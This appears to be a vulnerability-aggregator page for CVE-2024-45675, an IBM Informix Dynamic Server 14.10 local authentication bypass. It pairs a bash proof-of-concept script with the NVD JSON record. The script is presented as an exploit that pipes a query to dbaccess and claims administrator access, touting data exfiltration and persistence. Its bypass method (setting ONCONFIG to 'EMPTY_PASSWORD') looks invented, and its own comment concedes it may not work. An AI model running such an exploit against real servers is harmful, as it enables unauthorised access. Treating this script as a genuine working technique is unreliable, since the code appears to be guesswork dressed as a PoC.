CVE-2024-45675

#!/bin/bash # CVE-2024-45675 PoC - IBM Informix Dynamic Server Local Authentication Bypass # This PoC demonstrates the authentication bypass vulnerability in IBM IDS 14.10 echo "[*] CVE-2024-45675 IBM Informix Dynamic Server Authentication Bypass PoC" echo "[*] Target: IBM Informix Dynamic Server 14.10" # Check if onconnect or dbaccess is available if ! command -v onmode &> /dev/null; then echo "[-] Error: IBM Informix utilities not found" echo "[-] This script must be run on a system with IBM IDS installed" exit 1 fi # Method 1: Try connection with empty password as informix user # In a vulnerable system, this may succeed without password prompt echo "[+] Attempting authentication bypass with empty password..." sql_cmd="SELECT FIRST 1 * FROM sysmaster:sysdatabases;" # Try to connect without password (vulnerable behavior) echo $sql_cmd | ONCONFIG=EMPTY_PASSWORD dbaccess sysmaster - if [ $? -eq 0 ]; then echo "[+] VULNERABLE: Authentication bypass successful!" echo "[+] Attacker has gained administrator access to Informix server" echo "[+] Possible actions: data exfiltration, privilege escalation, persistence" else echo "[-] Target may not be vulnerable or access is restricted" fi # Note: Actual exploitation may require specific Informix environment variables # and connection strings. Refer to IBM documentation for proper connection methods.

{"cve": {"id": "CVE-2024-45675", "sourceIdentifier": "[email protected]", "published": "2025-12-02T03:16:14.587", "lastModified": "2025-12-03T17:26:23.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Informix Dynamic Server 14.10 could allow a local user on the system to log into the Informix server as administrator without a password."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-309"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:informix_dynamic_server:*:*:*:*:-:*:*:*", "versionEndExcluding": "14.10", "matchCriteriaId": "720F935C-B26C-4789-AC64-54A7B955FD14"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7252704", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}